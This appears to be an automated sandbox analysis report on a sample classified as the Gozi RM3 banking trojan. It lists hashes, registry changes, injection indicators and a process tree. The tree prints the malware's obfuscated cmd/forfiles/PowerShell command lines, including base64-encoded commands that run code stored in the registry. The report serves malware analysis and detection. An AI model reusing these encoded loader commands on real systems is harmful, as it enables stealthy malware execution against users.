Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
15-03-2022 14:05
Static task
static1
Behavioral task
behavioral1
Sample
520636dbbdc33d8dbdf1b14f043b46f8.exe
Resource
win7-20220310-en
windows7_x64
0 signatures
0 seconds
General
-
Target
520636dbbdc33d8dbdf1b14f043b46f8.exe
-
Size
252KB
-
MD5
520636dbbdc33d8dbdf1b14f043b46f8
-
SHA1
20eec5615c4ecca3603f889bccf975c855fa7a07
-
SHA256
bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb
-
SHA512
fc3869cf9a917b21e16f2f7150dbf78227c4e52a4f73a3b572555f38b2ae51358f32d0af7e08dc944529a1ed931f4cd09c694a92ad6b5680de58c4a2149077b6
Malware Config
Extracted
Family
gozi_rm3
Attributes
-
build
300994
rsa_pubkey.plain
Signatures
-
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2608 444 WerFault.exe 81 -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1239828497" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000cb9dac30eec32464c0c795d63a23a16a1f39e144fbdfd93c39f7732b99cbf3aa000000000e800000000200002000000017dddd0f48c0769f3af9c8afc1933554d96d0346db91e42a44737c75fe3f542f20000000b48ad91c8255229396dbf7f273ecc5e0f72491b5443edf66ec76ad2da20d50c0400000000081386f7dcacf39169071cb38b5d3ab2467633e70bf52fdd268946068c8e5d7e95881abd27e51502f2dbddb2a7e47da4167b7481cc11f835870af9a6be6fb62 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000de419273ed360fc7b985f29a5666c925130999b06d43ce83f366a6852b34c23c000000000e80000000020000200000003a69eccc18e68114d24bb3f168601f93bde4d41319e870d614be2f4529f96dbbc0000000516a51845089a88aa0450be52c4741b8d4fe5a47492b1601c209c784cc85abb25db0d52fc5fc4a40b2f0de4f96cf2211375f59d7e5706acc40e648bde5bfa6045e884740a02b59e2756b3e18e1c7f36d6b99addfafeee8a5cf779ab8cec5e4fa8957317cc7ebdbef96f4c4619210e4e286fe8d267adadbfbaf7311a4c9d357a29768663975c4b54efdc42e6723246e470556b20f3390611349b5c63b5a33180ee33688c15e2ded65c56c208ce2badb2b835cdf6a33caf63abb17527705533c8e40000000d6743633e0186dd3e47a177ac2c837d302c070379995f69bc4afb7555bf5e6602da2ea75091ad7ff521d76c7f72953575edeafbc8d25105ead4ae3fbca432bc5 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000eaadc152afb50912a2244160f1e7e4d66eb78ed52dc598744cff45eeeb747b5c000000000e8000000002000020000000391f757eebed04bfc5c7b703d390a326008b043df5cee6d7f234e78d62663a5bc0000000abefa4a65af79707cccef23d3ff7ef0115f34aa2e0a454728a28bff8dd2ee5913f5e9eaab4a94228ee7de102d2dbc7430968651b763743e26c068eaf956459fa73b14b2b790718aaa6ff08eb26d0db317cbd171abc36fd5bdf1a39f037b6a3cba783a37afae48febdfbaf98546fc6fa28cc8967cf390d245c1ef36e002ee6ace3971412b8455d270f99cc92b56aff149f05c0328b3ccce2467f875a9c16bea76f573c50e12be795cc92e2f535f1febea07bb986b3c4368e84b2315a3097183d8400000008c2f29a5648fabdc1d8581408709a732679afb27f6150d526d71b30987bf779cf71de29ac114554f2c902bbc3521761b46d7129e52396d52d14a1fc0e62854b0 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6045ab4b7e38d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000b5c2719d4402ce19a3c4d452d5fccb19a0b03547e8feee6c5e6129a97e614e0e000000000e80000000020000200000008369f785becf77e598de1a37e13b4a4a80e4dd5b637d255b6161812a43cc5edbc00000008a77f1996ea9713fe2ed530c7f5b4b79c54661a7c0227c7a164aee7345f67141fe052f15ad9f88d41df43afb8cdc708ee48036454d6d6a0295b83481df3413b34854e222f07af81c67a43ea9bc0da339dd2073755ab497a5c6768d23005dbf0971126f2d2d181cd637d7515d292b9d231f1e6a8c19260ed987db803da22cad8fc688aefa1cc4a4c0cf70fe540e8957e0b8aa37c6bda198fa111c85882cec9dc72ca66bd889b112d7e0e9ff4ae91cfd51752c6895f70c4554fa169bb9daf47c594000000072819e8bbcc6d8ef74d9597b96483136d18805911ec89797187e437e6d11cc2c151cde2cd7451f30a3b2ff7ab0e0600261950c8b4a317f23917d456d19251d40 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000278caae0289e07c01b55643235c1d17beaeb3ab3d647899a701ab368f4fc55ab000000000e8000000002000020000000a2d3534366cce6f8672509bfba1f9ee9bb14e88b07634f095528a360edd2612dc00000008d6a839b7fed1b295b23e575b9e43709cc50b29730c23502934b041d3f0946aaa37da38ed0f6b71acb6ddb16bfe42924bc0ac0702e43506a8ff1434f7e2b02cd22f49a27be4a9c303a4c00efe8ada9f1c75e7bb72c813656732c80f6f94e906822985cedfcc87c54baeb716905f8530d3b26575d820289fb111ae5af2950d07dc6623d543a1402cfa9e161f33705e5363643c0641ffa37192bf42358bcbde66ddd36be45da10ac558162b36dade161bd836faea5b27848929e8d053527fefc3e40000000452d3778d033f935497627f85519250b739e3a85435e414fb8538d98edda21a3da3c4534abd687529c3a5dd292af78a1f5b10d4400c838f131716b41734ad03b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ac16fa4d7d749c6f48b04e600045e586211c10e1eca22ca1b650425eecca04fc000000000e8000000002000020000000e33b3848fc714c4fb81104080bd3ee81c47c5a3f497a07237c4bb002fab3503ec0000000a5bf5b1bb138dfc8ce49df2e6c991c9e46e040c75336613ce72e89028f96324422b2f554a510a4348743f6d1bad51cf2b93640c7a97dc15546d04cc246701b97f1c65f5f6d9f01ac905ef077ac45a6df1d5d37544e0bfba5c4c0cc245866d56769b5f9c34ad61e9680dedaaa9b49ea6dea9bc9ef6e5950751907f56f955e47f6ca96ebc2fee851ce653cf4a265e2d0eec1c9c493e238fdd943f41547a330a973773f3012d039dbaa374bf03162ee6968e1179c6a85c81c867ed14a7ba6ba67f7400000007e57deb9f29453c88a9283b3e04d28b16caf07d880eba55796e51ff87d7eed0884d7b25591377c6942b589ef05ec2572fc0064af9f02415b4e5b9559ae9538d1 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000f072e04571f3a79c520911520eda0a6f2eac768d3496d11a29edaf9ea778c5f2000000000e8000000002000020000000cc84e32e32b8a586558e2a24efa5663ef8eddea3ca0a20961a89a533bc255b67c00000005b8197e1023d200f6ab6d4ee2de49c43ac550f5b7795c9f88a0965ce17599d42b51359fff60ba64f611537cafff3fc9e511c5ecd0d083f249b072a507c394659a778408f5425b48680f2b30eb098b0422761d69c0e8f7e4eb11ae213810868615986237ef3f2a432d876e6ca29fca03c53f6f24acf630edf8c1d3531c9d0de8282d5d5b9532158fe8218c560b7f189c220f308abc88b7b6ebc9b001d29ea241f4942223dfdea14d9ff90b97c864223d85566b40d99db10609a54c1a50f2a75954000000038ea2a2eb3ef1dad0ce43ebd65013c0205f4bf7460384b94ce80aa29081456dc2bccd49e320f211e40243e8d35f3735b8df4a83c9f507fed0739c48eae67781a iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1239828497" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000008c42e6b8d457f5146390167162fcb60a41c4124eca3d36bdd84895ecbcb3cd12000000000e800000000200002000000013aedbf5bc9a85450522fe2a856a6dfaf17178ef821b4d0eeea8db5b5923550cc0000000ba925dd49375f5faa0a1a1ed43192204126520210c0db80429727f713fc85dc0adcce282aeed8428a6a99382b9b0cabb2ccc3cc3f1027c365b3c52237ac78bac0bc2feff9681075858f641e0fb2b9c99f6b83eaade5aca23947113c90cb6f01f108e344b76e65b43c849eba7742d402d3a178621bb6f5172d880f6d404faa0adfa754bb163315e3ccfc7b121844e16e2c5d479b96a114e4a649d20d94441f9a0549f76ec8cd4cc42d0c96c4ee4cf9eae2e76dc35a1ca30d7058c563c7c0673bd4000000073fb1a99705aa73a5d36293a947463e2f96caf2c89f43ec0cf1050c25f02653bf31ea82f2c9422f6738bb5de443de1b71887507408b7e32e0830edd14a460803 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000097e9b3339d74b1b2a27394b9c04c68d9810549ea073ce400c1f26a70e483e573000000000e8000000002000020000000409ff2d119d14706fc8fc056cb00bfa9e02b1bdd8a1517571630130ea5bdfb0cc00000008b4dcc2d11885473e4f49787e893a372e9c7a4abf0e9c60613f666ce0aab891313301ba40607038fbba24b47e5422318c999ed6e71640f4c135eef439210882f49c0e410c69da73b824ce8081cd663d4eddcc1a0c0aa412bb0836b84a32928512e62433bf3a7bc398acdd570439456027212457de566fd1a437185dfd36076058884f88aca112a2c9796d31a06625045d478e22ecab29e7a7297d2d9011c210670361c61ad7db5fc7750f4ef655fac1c15cb064b7d71a9d3c98ff1cd2c149bcb4000000019ffb369db768ad67f79d3810f72a208f396cfd95cc76c895eca24eaf9da917edcfce43a8f03e4fb76479bb65dcf0dc16b06643c3ae51f1c030a7252e26c565d iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000054d062f3fc9ff1baad305cb2483c891eea0c033264892af6f7b4adb7cabebb38000000000e80000000020000200000002c34af920b5c2c27426d6a5f91ecc3e8e20d4051c2198130ae646919cf191c4ac00000003d6f6e2f7af086329acbd80e0631058a102a1d732fa052523a1cc6b6a0ff0f561ee100620bcb99625692b02d7076630ec5ea8cbcef3ca75a0d3794ec3e5079903f275c76f74199131d67313f46b2f1b33e36c4707e96644a4a13132388b087c2afc505ce5d9e2f3e32378816a99b2915f274ed30544eb676a1c3496becd10aba5ad7c80358b89b2ec68a1a686a39330ef6febaeef4ecb94aa105e765d187e14b76e65fa6fcc8ff97a2be6106663db051ca55a9cb4f1b8084548b8169c2b92f1a40000000712a405b1189c567029dd21d216a4a304ce24d79c090e94b6ceb639bfc6da4e8f25763b45e74209fe1871997b754f88e1aa5978903a769a70682d1bd9bcc0236 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947454" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1276 powershell.exe 1276 powershell.exe 4644 powershell.exe 4644 powershell.exe 2752 powershell.exe 2752 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 444 520636dbbdc33d8dbdf1b14f043b46f8.exe 1276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
pid Process 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe 4440 iexplore.exe -
Suspicious use of SetWindowsHookEx 44 IoCs
pid Process 4440 iexplore.exe 4440 iexplore.exe 3632 IEXPLORE.EXE 3632 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 2752 IEXPLORE.EXE 2752 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 4492 IEXPLORE.EXE 4492 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 4992 IEXPLORE.EXE 4992 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 1928 IEXPLORE.EXE 1928 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 2092 IEXPLORE.EXE 2092 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 2580 IEXPLORE.EXE 2580 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 2720 IEXPLORE.EXE 2720 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 4816 IEXPLORE.EXE 4816 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 4300 IEXPLORE.EXE 4300 IEXPLORE.EXE 4440 iexplore.exe 4440 iexplore.exe 5008 IEXPLORE.EXE 5008 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 4440 wrote to memory of 3632 4440 iexplore.exe 87 PID 4440 wrote to memory of 3632 4440 iexplore.exe 87 PID 4440 wrote to memory of 3632 4440 iexplore.exe 87 PID 4440 wrote to memory of 2752 4440 iexplore.exe 92 PID 4440 wrote to memory of 2752 4440 iexplore.exe 92 PID 4440 wrote to memory of 2752 4440 iexplore.exe 92 PID 4440 wrote to memory of 4492 4440 iexplore.exe 93 PID 4440 wrote to memory of 4492 4440 iexplore.exe 93 PID 4440 wrote to memory of 4492 4440 iexplore.exe 93 PID 4440 wrote to memory of 4992 4440 iexplore.exe 95 PID 4440 wrote to memory of 4992 4440 iexplore.exe 95 PID 4440 wrote to memory of 4992 4440 iexplore.exe 95 PID 4440 wrote to memory of 1928 4440 iexplore.exe 97 PID 4440 wrote to memory of 1928 4440 iexplore.exe 97 PID 4440 wrote to memory of 1928 4440 iexplore.exe 97 PID 4440 wrote to memory of 2092 4440 iexplore.exe 98 PID 4440 wrote to memory of 2092 4440 iexplore.exe 98 PID 4440 wrote to memory of 2092 4440 iexplore.exe 98 PID 4440 wrote to memory of 2580 4440 iexplore.exe 99 PID 4440 wrote to memory of 2580 4440 iexplore.exe 99 PID 4440 wrote to memory of 2580 4440 iexplore.exe 99 PID 4440 wrote to memory of 2720 4440 iexplore.exe 100 PID 4440 wrote to memory of 2720 4440 iexplore.exe 100 PID 4440 wrote to memory of 2720 4440 iexplore.exe 100 PID 4440 wrote to memory of 4816 4440 iexplore.exe 101 PID 4440 wrote to memory of 4816 4440 iexplore.exe 101 PID 4440 wrote to memory of 4816 4440 iexplore.exe 101 PID 4440 wrote to memory of 4300 4440 iexplore.exe 102 PID 4440 wrote to memory of 4300 4440 iexplore.exe 102 PID 4440 wrote to memory of 4300 4440 iexplore.exe 102 PID 4440 wrote to memory of 5008 4440 iexplore.exe 103 PID 4440 wrote to memory of 5008 4440 iexplore.exe 103 PID 4440 wrote to memory of 5008 4440 iexplore.exe 103 PID 636 wrote to memory of 1596 636 cmd.exe 106 PID 636 wrote to memory of 1596 636 cmd.exe 106 PID 1596 wrote to memory of 3624 1596 forfiles.exe 108 PID 1596 wrote to memory of 3624 1596 forfiles.exe 108 PID 3624 wrote to memory of 1276 3624 cmd.exe 109 PID 3624 wrote to memory of 1276 3624 cmd.exe 109 PID 1276 wrote to memory of 4644 1276 powershell.exe 110 PID 1276 wrote to memory of 4644 1276 powershell.exe 110 PID 1276 wrote to memory of 2752 1276 powershell.exe 111 PID 1276 wrote to memory of 2752 1276 powershell.exe 111 PID 1276 wrote to memory of 4192 1276 powershell.exe 112 PID 1276 wrote to memory of 4192 1276 powershell.exe 112 PID 4192 wrote to memory of 4280 4192 csc.exe 113 PID 4192 wrote to memory of 4280 4192 csc.exe 113 PID 1276 wrote to memory of 3124 1276 powershell.exe 114 PID 1276 wrote to memory of 3124 1276 powershell.exe 114 PID 3124 wrote to memory of 3800 3124 csc.exe 115 PID 3124 wrote to memory of 3800 3124 csc.exe 115 PID 444 wrote to memory of 2996 444 520636dbbdc33d8dbdf1b14f043b46f8.exe 35 PID 1276 wrote to memory of 2996 1276 powershell.exe 35
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 6243⤵
- Program crash
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\forfiles.exeforfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e3⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\cmd.exe/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
